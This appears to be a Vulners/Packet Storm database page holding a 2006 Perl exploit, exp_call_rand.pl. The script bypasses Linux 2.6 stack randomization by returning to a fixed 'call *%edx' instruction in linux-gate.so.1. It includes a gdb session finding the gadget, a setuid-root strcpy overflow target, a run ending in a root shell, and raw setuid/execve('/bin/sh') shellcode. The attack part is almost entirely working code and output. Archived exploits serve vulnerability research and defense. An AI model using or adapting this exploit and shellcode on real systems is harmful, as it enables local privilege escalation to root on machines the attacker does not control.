Lucene search

exp_call_rand.pl.txt

🗓️ 17 Aug 2006 00:00:00Reported by Andrea PurificatoType

packetstorm🔗 packetstormsecurity.com👁 30 Views

exploit solution for 2.6 kernel randomizatio

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`#!/usr/bin/perl -w  
use strict;  
#  
# [exp_call_rand.pl] Mon Apr 3 19:17:14 CEST 2006  
#  
# Exploit solution against 2.6 stack randomization  
# Using the "call *%edx" technic.  
#  
# Copyright: bunker - http://rawlab.altervista.org  
# 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2  
#  
# EXPLANATION: In 2.6 kernel we have a ghost library named   
# "linux-gate.so.1". It's a virtual DSO, a shared  
# object exposed by the kernel at a fixed address  
# in every process' memory. This part of memory   
# isn't randomized, so we can explore it to find   
# useful "call" or "jmp" instructions!  
# In this example we find "call *%edx" in memory   
# so we can execute shellcode passed to vulnerable   
# file by second argument ;-)  
#  
#  
# [Find "call *%edx" in memory]  
#  
# bunker@syn:~/vuln$ ldd vuln_prog  
# linux-gate.so.1 => (0xffffe000) <--- NOT RANDOM  
# libc.so.6 => /lib/tls/libc.so.6 (0xb7e84000)  
# /lib/ld-linux.so.2 (0xb7fcd000)  
#   
# bunker@syn:~/vuln$ gdb vuln_prog  
# (gdb) break main  
# Breakpoint 1 at 0x80483ad  
# (gdb) run  
# Starting program: /home/bunker/vuln/vuln_prog  
# Breakpoint 1, 0x080483ad in main ()  
# (gdb) x/i 0xffffe000  
# 0xffffe000: jg 0xffffe047  
# (gdb)  
# 0xffffe002: dec %esp  
# (gdb)  
# 0xffffe003: inc %esi  
# ...  
# (gdb)  
# 0xffffe74f: call *%edx <- Interesting, use this!!  
#  
# bunker@syn:~/vuln$ cat vuln_prog.c  
# int main(int argc, char **argv) {  
# char buf[256];  
# strcpy(buf, argv[1]);  
# }  
#   
# bunker@syn:~/vuln$ ls -al vuln_prog  
# -rwsr-sr-x 1 root users 8340 2006-04-02 20:11 vuln_prog  
#   
# bunker@syn:~/vuln$ perl exp_call_rand.pl 68  
# sh-3.1# id  
# uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)  
  
die "Usage: $0 <num>\n [ vuln_buf < 4byte_ret * num ]\n"   
if ($#ARGV != 0);  
  
my $num = $ARGV[0];  
print "Using multiplication factor $num...\n";  
  
# call *%edx  
my $ret = 0xffffe74f;  
  
# shellcode  
my $sc = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x6a\x0b\x58".  
"\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e".  
"\x89\xe3\x52\x53\x89\xe1\xcd\x80";  
  
# vulnerable file  
my $vuln = "./vuln_prog";  
  
# build buffer  
my $buf = pack("L",$ret)x$num;  
  
# boom! :-D  
exec $vuln, $buf, $sc;  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

17 Aug 2006 00:00Current

7.4High risk

Vulners AI Score7.4